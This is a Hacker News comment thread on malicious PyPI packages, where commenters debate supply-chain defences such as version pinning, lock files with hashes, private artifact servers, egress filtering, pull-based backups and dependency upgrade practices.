Hacker News new | past | comments | ask | show | jobs | submit login
Malicious PyPI packages stealing credit cards and injecting code (jfrog.com)
489 points by hpb42 on Aug 3, 2021 | hide | past | favorite | 226 comments



I don't think that it's good to just delete the packages. Same goes for Android Apps in the Google Play Store or for Chrome Extensions.

These compromised packages should have their page set to a read-only mode with downloads/installs disabled, with a big warning that they were compromised.

This is specially troublesome with Chrome Extensions and Android Apps, where it is not possible to get to know if I actually had the extension installed, and if I had, what it was exactly about.

Chrome Extensions getting automatically removed from the browser instead of permanently deactivated with a hint of why they can't be activated again, and which was the reason why the extension got disabled, is a problem for me. How do I know if I had a bad extension installed, if personal data has been leaked?

This also applies to PyPI to some degree.

----

Eventually the downloads should get replaced with a module which, when loaded, prints out a well defined warning message and calls sys.exit() with a return code which is defined as a "vulnerability exception" which a build system can then handle.


There is the "Yank" PEP 592 semantic that can be used to mark vulnerable packages. It's adoption has been a little slow, but I agree, having these packages available and marked accordingly makes it easier for security scanning and future detection research.

https://www.python.org/dev/peps/pep-0592/


Even better would be allow their install, but to have them start up with an immediate panic() sort of function (i.e., print("This package has been found to be malicious; please see pypi/evilpackagename for details"); sys.exit(99)) to force aborts of any app using those packages.


python packages run arbitrary code at install/build time, so this isn't viable.


It's no longer arbitrary if the PyPI crew is the one who controls the code, or did I understand you wrong?


Just that it isn't as simple as adding the lines to when the code gets executed. I think I misunderstood you, instead of prepending the code you are suggesting the entire compromised package get replaced with `throw "You got Hacked"` at import time.


Correct, when the program starts to run and imports the modules, as nothing will make admins more aware that something is really wrong here. Maybe raise an exception which, if not handled, executes sys.exit() with a predefined code.

And some mechanism to detect this at install/build time as well, so that automated built systems can cleanly abort a build and issue a specific message which can then be forwarded via email or SMS through some custom code.

The entire package gets replaced by a standardized, friendly one. No harmful code gets downloaded.


Denial of Service by panicing is also harmful for some processes.


It's not like an already running process will be affected by this.

This would only occur when the package gets updated or reinstalled, which shouldn't happen without supervision if the program is running in a sensitive context.

Else a Denial of Service is a good last resort measure in order to prevent running a malicious service. Ideally this gets detected at install/build time.


.whl packages don't run arbitrary code, they're just zips.


Skimming through that link, it seems that `yank` is for pulling _broken_ packages, whereas the suggestion above is to explicitly mark them as malicious.


Should we call the "mark them malicious" version "Yeet" or "Yoink"?


Good point. The keyword for uninstall and remove residual files should be Yeet indeed.

Downloading the latest, bleeding edge version should be Yoked

pip install yoked <package>


`npm yeet malcious-package`


This is why our build systems don’t use public repositories directly, and why we always pin to an exact version. Any third party dependencies (js/python/java/c/you-name-it) are manually uploaded to our Artifactory server- which itself has no internet access. All third party libraries are periodically checked for new versions, any security announcements etc, and only if we are happy do we update the internal repo.

It has been a bit of a challenge, especially with js & node and quite literally thousands of dependencies for a single library we want to use. In such cases we try avoid the library or look for a static/prepackaged version, but even then I don’t feel particularly comfortable.

I should really start specifying checksums too.


Own hosting, pinning, and checksum checks are defenses against network-based attacks and compromise of the package repository.

They do nothing against trojans like these. You will be running your own pinned checksummed version of the malicious code.

If you want to stop malware published by the legitimate package author, you need to review the code you're pulling in and/or tightly sandbox it (and effective sandboxing is usually impossible for dependencies running in your own process).


Well, it does induce a timed delay between upstream release of a compromised package and when it enters the own codebase. As long as the exploit is found and published before someone manually uploads it to the local store, you're safe.

But yes, a better option would be to run your own acceptance tests on each new upstream release, and that includes profiling disk/network/cpu usage across different releases.


Also introduces that same time delay for getting security patches released by package maintainers into your build pipeline.


This... worked in an org, where it literally took nearly 3 months to get package updates and additions approved... and that was for licensing review, not even proper security audits.

It may be safer to just accept that you live in the wild west and have systems boundaries in place to limit exposure/impact.

I've been pushing for closed-box logging targets, for example, where all logging goes to at least two systems (local and remote) so that the logging target is generally only available to submit log lines entries to. Not perfect, but where my head has been at.

Another thing is to PULL backups, not push them out.


> Another thing is to PULL backups, not push them out.

That's an absolute must. A push backup may not be a backup at all when you need it, or it may be compromised. It also requires the system you push into to be accessible for inbound connections, which in itself may be problematic.


Really once the secure channel between two processes running on each host is setup, there is no difference between the two methods. A pull backup can be tricked just as easily by presenting a false filesystem or backdooring the 'pull process' running on the compromised machine.

You want append only backups with secure timestamps and do forensics to find the last good snapshot. It is easier to set that up with pull backups, but not so hard with the right tools for push backups.


Another option is to use a cloud storage service that supports fine grained access control (e.g. write-only vs read-only) and retention polices.


Re: backups

Yes, yes, yes!

Not only that, but test your backups! And follow the 3-2-1 rule for any data of any importance: 3 copies in at least 2 different formats and 1 copy located off-site and in a different physical location from the other 2. Be sure to check the integrity of your backups, as well. It doesn't do much good to restore from a corrupted backup.

That all sounds like a lot of work, and an excess of paranoia, but you won't be thinking that when it comes time to restore from those backups. Let's see: pay millions of dollars in ransom anonymously in BTC to hackers who've held your data (and your company!) hostage, or, spend anywhere from a couple of hours to a few days restoring from backups.

It's your call, but, I know which one I would choose if I were the one who gets paged for things like that.


I'm trying to wrap my head around the concept of 'pulling' backups, rather than pushing them. In my mind, once you make a backup, you should then transfer it to a separate system for archival.

Where am I going wrong?


To pull backups, the backup system connects to the production system and grabs the data, storing it locally on the backup system. To push backups would be for the production system to connect to the backup system and send the data.

The main benefit of pull-based backups is that the production machine doesn't need credentials to write to the backup server; this means if production is compromised, it can't corrupt your backups.


If you can’t trust the production machine to initiate regular backups by itself, why do you trust the production machine to allow the backup server to access the production machine and make backups? In both cases you need an alert system to detect if a production system has not been backed up for too long.

Therefore, a push system is no different than a pull system, provided, of course, that the production system can only make new backups, not write indiscriminately to the backup server (e.g. delete old backups).


> If you can’t trust the production machine to initiate regular backups by itself, why do you trust the production machine to allow access by the backup server?

If production is compromised, you can't trust either.

> Therefore, a push system is no different than a pull system

Not entirely - a push system can DOS the backups much easier than a pull system (filling the disks, say), and a push system requires append-only backups in order to protect against backup corruption. A pull system just requires read-only access into production, which is much more simple to configure, audit, enforce, and maintain (IMO).


Not true. We assess each update in case of high priority issues that need a quick update.

Also we are cautious of using dependencies that don’t provide long term support/back fixes - where possible I pick stable, responsibly-managed dependencies. Postgres is a great example, security fixes are applied across multiple major versions, not just the latest.


Sounds exactly like what we do for medical device software.

Version pinning, self-managed forks and code reviews of the dependency on upgrade.


How do you get informed about whether a high-priority issue exists?

In particular, who is auditing the old version of the code that you happen to be running to make sure it doesn't have vulnerabilities that are now gone after a non-security-motivated change like a refactoring or a feature removal? Probably not the upstream maintainers, who generally only maintain HEAD.


Security mailing lists. GitHub has security alerts. Good old fashioned RSS. For example, rubygems.org supports RSS for releases. GitHub Release pages also support RSS. An easy way to create a shared RSS feeds is to create a #news channel in Slack that has all the feeds.

It can be a pain but that pain might be motivation to not pull in dependencies with little thought.


Again, how does any of that tell you whether a high-priority issue exists in the old version of the code that you're running, as opposed to in the latest release?


I understand your point. I'd expect the old version to have been reviewed when it was introduced into the system just as the new version should be. Of course, that doesn't guarantee something won't slip in.

Running private package infrastructure with audited dependencies isn't a panacea to stopping supply chain attacks. I do believe it's an effective defense-in-depth tactic for the reasons others have discussed.

An additional supporting tactic that should be done is to tightly control egress traffic. Like ingress traffic, all egress traffic should be denied by default. From there, traffic should be whitelisted. That makes it more difficult to exfiltrate data or communicate with command and control infrastructure. Tight control on egress traffic also makes it easier to alert on unexpected connection attempts. That all said, locking down egress traffic can be a pain. It also isn't a panacea. Where there’s a will there’s a way.


And you should run an antivirus in the repository machine. It will be really slow, but will eventually catch these malicious libs.


You will never eliminate the threat entirely, pinning and not using obscure projects does however cut down on the probability and you can't deny that.


Depending what you mean by "review," then I agree with you.

If you mean having humans inspect every line of code of every package, well... good luck with that. But, if you're talking about automated analysis and acceptance testing, then, I think you've got something.

Like unit testing, automated testing and analysis is never going to catch 100% of all issues, but it can definitely help your SRE team sleep at night.


it does stop against type-o'd dependencies. So if there was an evil package called requestss then you wouldn't be able to install it by accident.


I did a bunch of nodejs stuff at my last gig. These teams had the of practice keeping packages up to date. Drove me frikkin nuts. So much churn, chaos.

Is this a JavaScript thing? Carried over from frontend development?

Exasperated, I finally stopped advocating for locking everything down. Everyone treated me like I was crazy. (Reproducible builds?? Pfft!!)

Happens with enterprisey Java, Sprint, Maven projects too. (I can't even comment on Python projects; I was just happy when I could get them to run.)

What's going on? FOMO?

Lock ~~Look~~ down dependencies. Only upgrade when absolutely necessary. Keep things simple to facilitate catching regression bugs and such.

Oh well. I moved on. I don't miss it one bit.


Everyone I know uses some form of lock file, and most of the modern programming languages support it.

As for upgrading only when absolutely necessary, let's be honest, nothing is absolutely necessary. If the software is old, or slow, or buggy, well dear users you'll just have to deal with it.

In my experience however, it's easier to keep dependencies relatively up to date all the time, and do the occasional change that goes along with each upgrade, than waiting five years until it's absolutely necessary, at which point upgrading will be a nightmare.

I much rather spend each week 10 minutes reading through the short changelog of 5 dependencies to check that yes, that changes are simple enough that they can be merged without fear, and with the confidence that it's compatible with all the other up-to-date dependencies.


Both extremes are bad. If you never change anything, you are left behind on a lot of security updates and bug fixes. The longer you wait the harder it is to move.

The “stay current” model comes with risks too. It’s just a matter of figuring out which manner has the better value to risk trade off, and how to mitigate the risks.


One company I worked for had a bot that would periodically go and try to upgrade each individual app dependency, then see if everything built and passed tests.

If it got a green build, it would make a PR with the upgrades, which you could then either choose to merge, or tell the bot to STFU about that dependency (or optionally, STFU until $SOME_NEWER_VERSION or higher is available, or there's a security issue with the current version).

If not, it would send a complain-y email to the dev team about it, which we could either silence or address by manually doing the upgrade.

This worked out rather well for us. I think the net effect of having the bot was to make sure we devs actually paid attention to what versions of our dependencies we were using.


The solution was, and always been, to have someone review every commit to the libraries that your app uses, and raise red flags for security vulnerabilities and breaking changes to your application.

Oh, boy, I would love to work for a company that has someone like that. Know of any? At the least, I would love for a company to just give me time to review library changes with any sort of detail.


> It’s just a matter of figuring out which manner has the better value to risk trade off

This is also bad.

If you want to have both stability/reliability and also receive security updates you need somebody to track security issues and selectively backport patches.

This is what some Linux distribution do. Mainly Debian, Ubuntu, paid versions of SuSE and Red Had and so on


The sweet spot would be using a lock file for reproducible builds, and programmed dependency upgrades. Before the dependency upgrade you can check if the new version breaks something and plan for it.

I've used this in Python, where I try to keep dependencies to a minimum. I don't know if that would work in JavaScript, the dependency tree is huge there.


How do you deal with regressions?

For example, we once upgraded the redis client. One brief revision of the parser submodule had an apparent resource leak. (I can't imagine how...) Causing all of our services to ABEND after a few hours.

Because everything is updated aggressively, and there's so many dependencies, we couldn't easily back out changes.

--

FWIW, Gilt's "Test Into Production" strategy is the first and only sane regime I've heard for "Agile". Potentially reasonable successor to the era when teams did actual QA & Test.

Sorry, I don't have a handy cite. I advocated for Test Into Prod. Alas, we didn't get very far before our ant farm got another good shake.


When I see a regression, I look at what was recently updated (in the past hours, days), and it's usually one of those packages. Because frequent updates tend to be independent, it's usually not difficult to revert that change (eg. if I update react and lodash at the same time, chances are really good that I can revert one of those changes independently without any issues)


This is the way.

Also, you should try to update as few things as possible at once, and let your changes "soak" into production for a while before going in all "upgrade ALL the things!"

Why? Well, sometimes things that fail take a while to actually start showing you symptoms. Sometimes, the failure itself takes a while to propagate, simply due to the number of servers you have.

And, one of these days, cosmic rays, or some other random memory/disk error is going to flip a critical bit in some crucial file in that neato library you depend on. And, oh, the fouled up build is only going to go out to a subset of your machines.

You'll be glad you didn't "upgrade ALL the things!" when any of these things ends up happening to you.


Totally agree. That's why I'm asking if compulsively updating modules is a JavaScript, nodejs, whatever pathos.

This team pushed multiple changes to prod per day. And the load balancer with autoscaling is bouncing instances on its own. And, and, and...

So resource leaks were being masked. It was only noticed during a lull in work.

And then because so many releases had passed, delta debugging was a lot tougher. And then because nodejs & npm has a culture of one module per line of source (joking!), figuring out which module to blame took even more time.

I think continuous deploys are kinda cool. But not without a safety net of some sort.


I'm gonna toss this grenade out here, just because I don't see a better place to do it lol...

One of the companies I worked at had an incident a couple years before I started, where there were multiple malicious Python libraries being used in the code. For 3 months.

Luckily, the libraries didn't do anything significant except to ping an IP address in China, actually did perform their advertised functionality, didn't exfiltrate any data other than the source IP address on the ping packets, and they were easy to replace once the situation was found out. But, for months, they had servers pinging or attempting to ping somewhere in China.

Oh, and those libraries made it into our internal repos we were using to pin versions with, too.

Beyond being a speecy spicy meatball of a story, the moral here is that you have to constantly be on your guard and verifying every single line of code that goes into your application somehow.


Also, you really ought to not allow egress from your servers except to your load balancer.

Just attempting should create alarms.


Correct. That's probably actually why it took so long to detect the malicious packages: when the got installed on machines running internal services, nothing much unexpected happened. Come to think of it, I actually don't remember how the packages were detected and identified to begin with.


In my experience although lock files are widely used in Node development, utilizing the lock files as part of a reproducible build system is far less prevalent in the wild. In fact, the majority of Node development I've seen eschews reproducible builds on the basis that things are moving too fast for that anyway, as if it were somehow a DRY violation, but for CICD. Would love to hear from Node shops that have established well followed reproducible CICD.


Good luck when your security department starts running XRay and demands all your dependencies are at the latest versions all the time because every second release of a package is reported as vulnerable.


Ya. That's a tough one. Philosophically, I totally support vetting. I don't know we'd make it useful.

Pondering...

One past team had a weekly formal "log bash" ritual. I LOVED it.

That ops team kept track of everything. Any unexplained log entry had to be explained or eliminated. They kept track of explained entries on their end, so we wouldn't waste time rehashing stuff. I imagine their monitoring tools supported filters for squelching noisy explained log entries.

Maybe the security team which owns XRay could do something similar.


But.... We're right though? I mean there is some wiggle room, if some lib has a security hole in some functionality that's not actually being used, but it's all about risk. We gate deploys to prod over something like XRay or LifeCycle and the frustration it causes our devs is much cheaper than deploying something we know is insecure to prod and would cause us to fail an audit or something (let alone get pwned).


There was a recent discussion on HN about `npm audit` and its overwhelming number of false positive vulnerabilities [0]. I can see a policy like this being frustrating in the case of `npm dependencies`. Is this something you deal with?

[0] https://news.ycombinator.com/item?id=27761334


I mean you can have reproducible builds while being on the upgrade train. `package-lock.json` eixsts for a reason. And the tiny pains of upgrading packages over time mean that then you don't have to deal with gargantuan leaps when that one package has the thing you want and it requires updating 10 other packages because of dependencies.

Node is a special horror because of absolute garbage like babel splitting itself into 100s of plugins and slowly killing the earth through useless HTTP requests instead of just packaging a single thing (also Jon Schlinkert wanting to up his package download counts by making a billion useless micropackages). But hey, you're choosing to use those packages.

I think if you're using them, good to stay up to date. But you can always roll your own thing or just stay pinned. Just that stuff is still evolving in the JS world (since people still aren't super satisfied with the tooling). But more mature stuff is probably fine to stick to forever.


> Only upgrade when absolutely necessary.

Gotta disagree with this part. If you're making a web app package updates really need to be done on a regular cadence, ideally every quarter, but twice a year at minimum IMO. In the .Net world at least it feels like most responsible open source maintainers make it relatively painless to upgrade between incremental major versions (e.g. v4 -> v5). If you put off upgrades until someone holds a gun to your head so that your dependencies are years out of date, you're much more likely to experience painful upgrades that require a lot of work.


Backwards compatibility in the javascript world isn't great. If you stop updating for a couple of years, half your libraries have incompatible API changes. Then something like a node or UI framework update comes along and makes you update them all at once to work on the new version, and you're rewriting half your application just to move to a non-vulnerable version of your core dependency.


Java/Spring/Maven should have locked down dependencies by default. They have to go out of their way to not do that. Not that some people don't, anyway.

Typos:

> I stopped advocating for locking everything down.

started?

> Look down dependencies.

lock?


I think the first typo is actually correct. They're saying that they stopped advocating for it because everyone treated them like they were crazy for doing so.


AFAIK Maven and Gradle don't have any built-in way of locking down dependencies (direct or transient), unless I missed something.


In my experience, Maven always uses the exact version specified in your pom.xml (and the pom.xml of your dependencies, transitively), it never uses a newer version automatically. That is, the built-in way in Maven is locked down dependencies.


Edited. Thanks for proofreading my rant. :)


I tend to assume OSS contributors/maintainers are working generally to make things better, features I'm not using/don't need aside, they're fixing bugs (that I might not know I'm hitting/about to hit), patching security holes, etc. - so that's one for the 'pro-upgrading' column.

Against that, sure, there might be something bad in the new release (maliciousness aside even, there might be a new bug!). But.. there might be in the old one I've pinned to as well? Assuming I'm not vetting everything (because how many places are, honestly) I have no reason to distrust the new version any more than my current one.

Reproducible builds are an orthogonal issue? You can still keep your dependencies' versions updated with fully reproducible builds. Ours aren't, but we do pin to specific versions (requirements.txt & yarn.lock), and keep the former up to date with pyup (creates and tests a branch with the latest version) and up to date within semver minor versions just with yarn update (committed automatically since in theory it should be safe, had to revert only occasionally).


> keeping packages up to date.

It’s good security practice, especially for anything internet facing.

Sure, you don’t have to do it obsessively, but if you let it stagnate you can have trouble updating things when critical vulnerabilities are found, and you have a huge job because multiple APIs have changed along the way.


I get notifications every other week about my NodeJS packages having security vulnerabilities, and so I upgrade.

I'm not sure why NodeJS devs are so bad at security compared to say C++ devs. It's not like I'm getting asked to upgrade libstdc++ and eigen all the time ...


I’m not going to get into barriers for entry and what kind of developer chooses which language, but C/C++ has always eschewed having unnecessary dependencies (originally because dependency management is hard, but that’s no longer the real reason - it’s just become baked into the culture). Even if you copy and paste hundreds of lines of code (or individual source files) the way you think about and treat them is very different from when they are external to your code base. You own (your copy of) them now, and at the very least, you familiarize yourself with their internals (and you wouldn’t copy and paste something that had its own dependencies). Actual (dynamically linked) dependencies don’t export objects with super brittle interfaces so much as they do expose very stable, carefully designed, and as minimal as possible boundaries for interfacing with their internals. Anything crossing API boundaries is considered leaving/entering the trusted domain, and lifespans of pointers and references in a non-garbage collected language guide/force you to eschew incorporating external libraries into your code globally and isolate the interaction (and therefore, the attack surface area) between your code and external code.

Then there’s the type system. Despite having some of the weakest type systems of strongly types languages, C (to some extent) and C++ (especially modern C++) are still light years ahead of what even Typescript buys you because they don’t offer the same escape hatches or “fingers crossed this TS interface matches the JS object that we are binding it to, but two lines from here, no one will remember that this isn’t actually a native TS class and that this non-nullable field might actually be null because the compile-time type checking system can’t verify this even at runtime without manual user validation because the MS TS team refuses to transpile type validation because they insist on zero overhead even though JS is not a low level or systems language.”

More than anything else however, developers of statically typed languages tend to fundamentally disagree with the idea of “move fast and break often” and will put off changes for years if they’re not at least 90% sure it’s the correct solution (and even when they end up wrong, it’s still far better than someone that says “who cares if it’s the or even just an actually correct solution, it’s still a solution and we can always revisit this later”).


Feels like this is a business opportunity for someone.

Use case:

1. Upload a pre-reviewed package.json file. 2. The service monitors changes, and recommends updates. Recommendations might include security, bug, features, etc. It would check downstream dependencies, too. For production systems, the team might only care about security features. 3. Developer team can review recommendations, and download the new package.json.

(There are lots of opportunities to improve this: direct integration with git, etc.)

Anybody know if this sort of service exists? I know npm has _some_ of this. Maybe I'm just ignorant of how much of a solved problem this is?


What you’re looking for is called SCA (software composition analysis).

Best tool I’ve used so far in this domain is snyk.


> Feels like this is a business opportunity for someone.

This is what some Linux distributions do. Quality review, legal review, security backports.


We use Renovate for this.


node locks down dependencies for you, not only the version, but it saves a hash too. The problem is that npm install will install the newest version allowed in your config, and re lock it. However if you run npm ci, it will only install what is locked, and fail if the hashes don't match.

in python pipenv works the same way, pipenv sync will only install what is locked, and will check your hashes. I'm not sure about poetry.


For quite a while now, the JS ecosystem has used lock files -- npm, yarn, pnpm. You have to got out of your way not to pin JS dependencies.


They have no concept of ever needing to reproduce a build. And they are probably right if you do continuous development of some SaaS stuff.


I’ve heard the argument that it’s not worth spending the time to get all aspects of your build environment into version control for 100% reproducible builds, but the saying “I shouldn’t be bothered to know what my upstream deps are” that’s pretty sad (hopefully rare).

Even with the continuous deploy stuff, I think you’re giving too much benefit of the doubt. If an upstream non-pinned change brings down something critical (e.g. payments), you’ll revert the change in source, rebuild, release, the site is still broken. If you keep old artifacts you can push one of those, now you’re not really doing continuous deployment, and you won’t be again until you finish root cause analysis, and since you’ll never see the relevant change in your source code, it could take a while.


I agree. Locking things down is the way to go, when it comes to safety.

The downside, however, is that, by design, you end up with packages that don't get upgraded regularly. That can cause problems down the road when you decide you do want to upgrade those packages.

For instance, there might be breaking changes, because you're jumping major versions. Of course, breaking changes are always a problem, but, if you're not regularly upgrading stuff, your team will tend to build on/build around the functionality of the old version.

That leads to some real fun come upgrade time. If, you're, say, 3 major versions behind the latest version, or whatever version you want to upgrade to that contains some Cool New Feature(tm) you really, really need, you might end up having to do this silly dance of upgrading major versions one at a time, in order to keep the complexity of the upgrade process as a whole under control.

Oh, and, sometimes things get deprecated. That's always fun to deal with.

So, TL;DR: Yes, pin versions! It's safer that way! Just be aware that, like most engineering decisions, there's a tradeoff here that saves you some pain now in exchange for some amount of a different kind of pain in the future.


on the other hand, if you don't keep your packages up to date, you can get so behind that it is nearly impossible to upgrade.

especially bad if the older version you are on turns out to have vulns.

Josh Bloch says to update your packages frequently and I agree.


Sorry, I don't quite see how this would protect against supply chain attacks. If an upstream dependency is back-doored, they just have to silently add their code in an otherwise reasonable sounding release, and now you will happily download that version, add it to your internal mirrors, and pin its version forever. Unless you actually read the diff on every update, which I think is impractical (although you're welcome to correct me), I don't see how this is buying you much.


It’s not 100% bullet proof, but it’s safer than pulling any random repos directly from the internet.

It’s also good that your business doesn’t have to rely on a third party every time you need to pull down your dependencies and build your software.


Protects you against a dependency being hijacked and retroactively embedding malware in prior versions . Check summing would protect against that without the trouble of manually hosting the dependency.


I think part of the idea is that if you only use versions that have been released for a little while, you are hoping SOMEONE notices the malicious code before you finally update.

There are a number of issues with this approach, although the practice still might be a net benefit.

One, you are going to be behind on security patches. You have to figure out, are you more at risk from running unpatched code for longer, or from someone compromising an upstream package?

Two, if too many people use this approach, there won't be anyone who is actually looking at the code. Everyone assumes someone else would have looked, so no one looks.


My read was GP is implying they do read the diff every time, and only change the pinned version after a manual review- "only after we are happy."

This does seem impractical at even a modest scale.


What does "modest scale" mean? Some people have to have all dependency updates reviewed and have some level of independent security team monitoring dependency changes. Not everyone has this, but the context is key as some domains have this consistently.

Some of this is cultural in addition to being paranoid about security, or having strict compliance requirements. For your average startup, they may not have any time to dedicate to this and other fires, but that's not a universal situation.


> What does "modest scale" mean? Some people have to have all dependency updates reviewed and have some level of independent security team monitoring dependency changes.

Who? Seems totally intractable to me.


We periodically review all dependencies change logs, security advisories etc and update based on risk review. We also keep an eye out for critical vulnerabilities that need immediate patching. There are tools to help with this, plus communities like HN are relevant for breaking news.


Yes, this is why I implemented hash-checking in pip (https://pip.pypa.io/en/stable/topics/repeatable-installs/#ha...). Running your own server is certainly another way to solve the problem (and lets you work offline), but keeping the pinning info in version control gives you a built-in audit trail, code reviews, and one fewer server to maintain.


Doesn't Poetry do this by default in its lockfile too?


There is an active PEP[0] for defining lockfiles.

0: https://www.python.org/dev/peps/pep-0665/


This is how it always used to be, back in the before[1] times. Libraries would be selected carefully and dependencies would be kept locally so that you could always reproduce a build.

The world is different now, and just being able to select a package and integrate it like that is a massive effectiveness multiplier, but I think the industry at large lost something in the transition.

([1] before internet package management, and before even stuff like apt and yum)


The problem is that it also is a vulnerability multiplier.

People used to understand every package the installed. Now, they install dependencies of dependencies of dependencies, to the point that they have not even SEEN the name of most of their dependencies.

Install anything with maven and count the number of packages installed. It is appalling.


> I think the industry at large lost something in the transition.

Lost a lot of trust and security with the advent of language-specific installers that pull libraries and their dependencies from random URLs without any 3rd party vetting.


I agree, though I think there are a couple pieces to the puzzle. Like, quite apart from the enormous convenience of new releases being available right away, and even being able to drop in a git URL and run your dependency off a branch while you wait for your upstream PR to merge, pip provides isolation between workspaces that apt has never been able to do natively because it's too generic— the closest thing is lightweight unshares, but those were years after virtualenv, require more ceremony to get going with, and may be isolated from the outside system in ways that impede productivity (there's also never really been a consistent tooling story for it, with having to cobble together debootstrap + whatever the chroot flavor of the week is).

But the biggest issue is when npm, cargo, etc showed how to include a dependency multiple times at different versions. Operating system package managers (other than Nix & friends) have no concept for how this could or would work. Pip has no story for it, and the various pip-to-apt bridges like py2deb and stdeb if anything just exacerbate the problem, by mixing your project's dependencies with those on your system.

Anyway, yes. Things were lost, 100%. But I don't think the system you want (isolation, version freedom, but with safe/vetted packages) is going to be something that's possible to evolve out of any of the current systems. It's got to be something that goes back to first principles.


> pip provides isolation between workspaces that apt has never been able to do natively because it's too generic

This is hardly a concern on production systems. It's been common practice for decades to deploy each service on a dedicated host, or at least a VM in order to have a degree of security isolation. [or a container if you don't care]

> npm, cargo, etc showed how to include a dependency multiple times at different versions

And this is why they cannot provide stable releases and security backports.

If you want security updates you can use Debian or pay $$ for SuSE or Red Hat or $$$$ for custom support from some tech companies, but they will mostly support one version per package.

The combinatorics explosion of packages times versions on archives like npm or pypi makes it prohibitively expensive to reliably patch and test every combination of packages and versions.

Debian has been pioneering reproducible builds and automated installation CI/QA and it still took a lot of effort to get there.

> I don't think the system you want (isolation, version freedom, but with safe/vetted packages) is going to be something that's possible to evolve out of any of the current systems.

I don't want version freedom: it's not attainable. It's not a software problem, it's a math problem.

> It's got to be something that goes back to first principles.

Any idea?


If you don't want or need version freedom, what is it about the existing deb/rpm ecosystems that don't work for you, either on their own or in conjunction with the various tools that bridge other ecosystems into them? (I'm a fan of dh_virtualenv, myself)

Or is your lament that the world as a whole is worse off because others have eaten of the fruit of systems like npm and pip?


The latter, albeit it's not "the world as a whole", but some tech bubble. Various large companies prohibit pip/npm/docker.

(and here I'm even getting downvoted for going against the hivemind)

I can only hope that after enough software supply chain attacks the industry will realize that distros were right all along.


FYI - You can overwrite an existing package’s release/version via pip (at least when using Artifactory’s PyPi). Not safe to assume pinning the version ‘freezes’ anything.


Make a "lockfile" with the pip-compile tool [0] that includes hashes. Unless you happen to fetch the hash after the package has been compromised, this should keep you safe from an overwritten version.

[0]: https://pypi.org/project/pip-tools/


No, you cannot overwrite a file on PyPI once uploaded, even if you delete the release first. This policy has been in place for many years.


Pip also supports packages hashes so you can be sure you're getting the exact same package that you got last time.


Yep. You should also be hosting and deploying from wheels[0], even for stuff you create internally. If you're doing it right, you'll end up hosting your own internal PyPi server[1], which, luckily, isn't hard[2].

We did this at one of my previous companies, and, of all the things that ever went wrong with our deploy processes, our internal PyPi server was literally never the culprit.

---

[0]: https://pythonwheels.com/

[1]: https://github.com/testdrivenio/private-pypi

[2]: https://testdriven.io/blog/private-pypi/


I have been doing internal repositories and vendoring since 2000, only for personal projects do I do otherwise as they are mostly throw away stuff.

Teaching good security practices and application lifecycle management seems to always be an uphill battle.


Out of curiosity, is it really necessary to have the separate artifact server? Pinning dependencies by hash ought to be sufficient.


Seems reasonable enough depending on your use case.

In our situation we store our own (private, commercial) artifacts as well as third party ones, so we already need to have a server, and we know our server is configured, maintained & monitored in a secure fashion whereas I have no guarantees with public servers.

Plus our build servers don’t have access out to the internet either, for security. Supply chain attacks like SolarWinds and Kaseya are too common these days.

Edit: Also, our local servers are faster at serving requests, allowing for faster builds, and ensures no issues with broken builds if a public repo went offline or was under attack.


Security and availability don't have to be mutually exclusive. I remember in the early day of Go modules our Docker builds (that did "go mod download") would be rate-limited by Github, so a local cache was necessary to get builds to succeed 100% of the time. (Yes, you can plumb through some authentication material to avoid this, but Github is slow even when they're not rate limiting you!) Honestly, that thing was faster than the official Go Module Proxy so I kept it around longer than necessary and the results were good.

Even if you cache modules on your own infrastructure, you should still validate the checksums to prevent insiders from tampering with the cached modules.

I'll also mention that any speed increases really depend on your CI provider. I self-hosted Jenkins on a Rather Large AWS machine, and had the proxy nearby, so it was fast. But if you use a CI provider, they tend to be severely network-limited at the node level and so even if you have a cache nearby, you are still going to download at dialup speeds. (I use CircleCI now and at one point cached our node_modules. It was as slow as just getting them from NPM. And like, really slow... often 2 minutes to download, whereas on my consumer Internet connection it's on the order of 10 seconds. Shared resources... always a disaster.)


Tangential non-sequitor:

> self-hosted on AWS

People forgot what self-hosting actually means.


I disagree with that analysis. That basically means running some binary yourself, with the alternative being buying a SaaS product that is hosted by the developer. You may think that "self-hosting" means having your own physical server, but I have never heard anyone else use the expression like that.


Meanings can evolve over time. I tend to think of self hosted as installing from code and managing myself, whether on local hardware or remote.


The OP wrote "self-hosted Jenkins", which has a different meaning


It's going to depend on your circumstances. You don't share any context about your app or any of your development. Rather than looking at this from the perspective of needing an artifact server, you just look at it as a case of supply chain protection.

If pinning dependencies counters all the threats in your threat model, then fine. If not, you need to be doing something to counter them. An artifact server, or vendoring your dependencies, provides provides a lot of additional control where chokepoints or additional audits can be inserted.

If there was no management cost or hassle then you'd just have an artifact server to give you a free abstraction, but it's a trade-off for many people. It's also not a solution in itself, you need to be able to do audits and use the artifact server to your advantage.

The problem is really with the threat models and whether someone really knows what they need to defend against. I find that many engineers are naïve to the threats since they've never personally had exposure to an environment where these are made visible and countered. At other times, engineers are aware, but it's a problem of influencing management.


It's nice to have a build machine that can complete a build when it's disconnected from the Internet


How often does that happen?



Docker Hub also has rate limits and outages, so yet another thing you want to cache if you promise customers "we'll install our software in your Kubernetes cluster in 15 minutes 99.95% of the time".


I don't see how any of those are build machines that are offline.


Build machines generally want to be 'online' so they can connect to the internet. They want to connect to the internet so they can access services hosted on the internet. Many of those services use Cloudflare, Akamari or Github. If any of those are down, those services are down. Now it's great that your build machine is online, but the packages it's trying to fetch won't be available because their CDN is offline.

Now if only you had a local caching proxy.


Sometimes I use an air gapped test lab. Setup of certain software and projects is a real pain. Sounds like this approach could help.


It's standard practice in many large companies.


We use an artifact server and our build servers are completely airgapped. We know exactly what dependencies are used across the organisation. We can take centralised action against malicious dependencies.

I wouldn't bother having one if you're small (<25) people. If you start having a centralised Infosec group, then it starts to become necessary.


Airgaped? Really? Everytime a build happens someone physically moves a Thu drive or some other media too from the build server?

Airgap means not networked, even internally. Not just "blocked" from internet.


Wikipedia[1] offers a slightly relaxed definition, although I agree, I (and my colleagues) abuse the term.

The artifact repository server connects to the internet via a proxy. Build servers have no access to the internet.

[1] https://en.wikipedia.org/wiki/Air_gap_(networking)


Depending on what you're using for package management, an "artifact server" can be as simple as a directory in git or a dumb HTTP server. File names are non-colliding and you don't really need an audit log on that server, because all references are through lock-files in git with hashes (right? RIGHT?), so it basically doesn't matter what's on there.


You should mention this in your interviews. Keeping up to date with the state of the art is implicit for me. If I need to spend months retraining or up training because of company policy I expect to be compensated for that while employed.


We are upfront about it in interviews. We definitely don’t want unhappy developers, but we also don’t want insecure code. We do upgrade libraries but we do so only after analysing risk and impact. None of our developers have spent months training to develop our code.


